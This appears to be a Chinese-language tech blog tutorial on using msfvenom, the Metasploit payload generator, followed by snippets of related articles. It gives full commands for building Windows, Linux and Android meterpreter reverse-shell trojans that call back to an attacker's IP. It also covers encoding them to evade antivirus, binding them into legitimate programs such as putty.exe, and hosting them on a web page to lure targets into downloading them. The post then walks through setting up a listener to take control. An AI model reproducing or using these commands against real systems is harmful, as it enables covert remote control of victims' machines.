msfvenom基本使用

最新推荐文章于 2024-08-22 22:20:04 发布
最新推荐文章于 2024-08-22 22:20:04 发布
阅读量327 收藏
点赞数
分类专栏: 渗透 文章标签: linux 网络安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53440207/article/details/129209561
版权

常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线。

参数介绍

 1.p (- -payload-options) 
添加载荷payload。 
(- -payload-options 列出payload选项) 
2. –l 
查看所有payload encoder nops。 
3. –f (- -help-formats) 
输出文件格式。 
(- -help-formats 列出所有文件格式) 
Executable formats: 
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vbaexe, vba-psh, vbs, war 
Transform formats: 
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript 
4. –e 
编码免杀。 
5.a (- -platform – -help-platforms) 
选择架构平台 
x86 | x64 | x86_64 
Platforms: 
windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe 
6. –o 
文件输出。 
7. –s 
生成payload的最大长度,就是文件大小。 
8. –b 
避免使用的字符 例如:不使用 ‘\0f’。 
9. –i 
编码次数。 
10. –c 
添加自己的shellcode。 
11.x | -k 
捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

常用后门

windows:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[本地 IP] lport=[监听端口] -e [编码方式] -i [编码次数] -f [格式] >[木马程序文件名]

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.128 lport=8888 -e x86/alpha_mixed -i 1 -f exe >/home/yijin/fake-page/static/evil.exec

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.123 lport=8888  -f exe -o muma.exe

linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f elf > shell.elf

安卓

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.6.4 lport=6666 >muma.apk

参数解释
1.-p payload
攻击所用的 payload,这里使用 windows/meterpreter/reverse_tcp,获取反弹 shell。
2.lhost local host
攻击方 IP 地址。
3.lport local port
攻击方端口,这个端口与 msfconsole中监听的要一致。
4.-e encoders
将程序进行编码,以绕过杀毒软件的检测,这里我们使用 x86/alpha_mixed。
5.-i iterator times
迭代的次数,因为每次编码是对上一次编码的内容再次进行编码,在计算机领域这种操作叫做“迭代(iterator)”,因此参数是 i.
迭代的过程中程序的体积会越来越大,因此要适当控制迭代次数。
6.-f file type
这里我们是要生成 Windows 可执行程序,因此格式为 exe。
7.写入文件
我们将在 /home/yijin/fake-page/下跑一个网页服务,并诱导靶机从这里下载木马,因此放在这个目录下。



## 具体使用
生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=8888  -f exe -o /var/www/html/muma.exe
1.msfconsole进入 metasploit 控制台;
2.use exploit/multi/handler 使用监听模块来连接木马;
![在这里插入图片描述](https://img-blog.csdnimg.cn/ae6b73170a834de68f699de0c21a9a84.png)

3.set payload windows/meterpreter/reverse_tcp 设置 payload 要和生成木马的payloads一致;
![在这里插入图片描述](https://img-blog.csdnimg.cn/7d76fd681f5b42d3b4c7b0fa3a6c2907.png)
4.set LHOST [IP]设置本地IP(攻击机 IP);
5.set LPORT [PORT]设置本地监听端口 IP和端口也要一致;
![在这里插入图片描述](https://img-blog.csdnimg.cn/19e944d278dc4b72bb13a5b9d4f06d2c.png)
6.run开始监听当木马被运行就会有回显。
![在这里插入图片描述](https://img-blog.csdnimg.cn/c57ecbb6d89045bca28b9a91fb57a4ac.png)7.然后就可以执行一些系统命令拿到权限
![在这里插入图片描述](https://img-blog.csdnimg.cn/a48f3565659c4c1baf0f5668c81247cd.png)
利用msfvenom渗透win7
CODING...
11-12 1万+
msfvenom是kali linux下一个可以产生自定义payload的程序,接下来我们利用msfvenom产生一个新的win7下的计算器后门程序,利用windows/meterpreter/reverse_tcp来对目标靶机windows7进行控制。
msfvenom的简单使用
jeff_true的博客
01-14 663
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
kali渗透内网和外网
最新发布
dzqxwzoe的博客
08-22 1056
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
msfvenom使用
公众号shadow sock7
04-26 6650
参考: http://www.zerokeeper.com/tools/use-of-msfvenom.htmlMsfvenom 是净荷生成和编码的组合。 它将取代 msfpayload 和 msfencode 于 2015 年 6 月 8 日。产生一个payload要用msfvenom产生一个payload必须要指定-p, --payload和-f --format两个参数。 查找有哪些有些p
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1763
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
msfvenom常用参数
m0_61506558的博客
08-29 1636
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
MSFVenom基本参数解析与使用技巧
MSFVenom是Metasploit Framework中的一个重要工具,用于生成各种类型的恶意代码载荷(Payload)。它可以通过简单的命令行配置,生成各种平台、架构和格式的Payload,包括但不限于反弹Shell、Meterpreter以及其他类型...
使用MSFVenom生成基本的反弹Shell
MSFVenom简介 ### 1.1 MSFVenom是什么 MSFVenom是Metasploit框架中的一个重要工具,用于生成各种类型的payload。它可以创建定制化的恶意软件代码,用于渗透测试、漏洞利用和网络攻击。 ### 1.2 MSFVenom的作用和...
如何使用msfvenom生成基本的反向TCP木马
通过使用msfvenom,攻击者可以定制和生成特定的恶意软件来满足其攻击需求。 ## 1.2 什么是反向TCP木马 反向TCP木马是一种常见的网络攻击技术,用于在目标主机上建立一个与攻击者主机的反向TCP连接,以便攻击者可以...
Msfvenom基础:生成基本Payload
Msfvenom简介 ## 1.1 Msfvenom概述 Msfvenom是Metasploit框架中的一个重要工具,用于生成各种类型的payload。通过Msvenom,可以创建支持多种系统平台的payload,包括Windows、Linux、Android等。它是渗透测试和...
msfvenom
weixin_59114667的博客
03-02 174
木马程序格式:jpg exe txt
msfvenom介绍
weixin_46483815的博客
05-11 2568
主要介绍msfvenom 和一些实验
Msfvenom介绍及利用
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom常见的使用命令
路baby的博客
06-24 2757
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1091
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
Msfvenom使用指南
m0_57221101的博客
02-08 6216
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom java_Msfvenom 参数实例
weixin_30996983的博客
02-28 202
参数说明:–p(- -payload-options)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!(- -payload-options 列出payload选项)–l查看所有payload encoder nops。–f(- -help-...
msfvenom 实现多态技术的使用方法
05-31
下面是使用 msfvenom 实现多态技术的基本步骤: 1. 生成 payload:首先需要使用 msfvenom 生成一个 payload,例如 Windows 反向 Meterpreter shell: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

制冷少年的成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值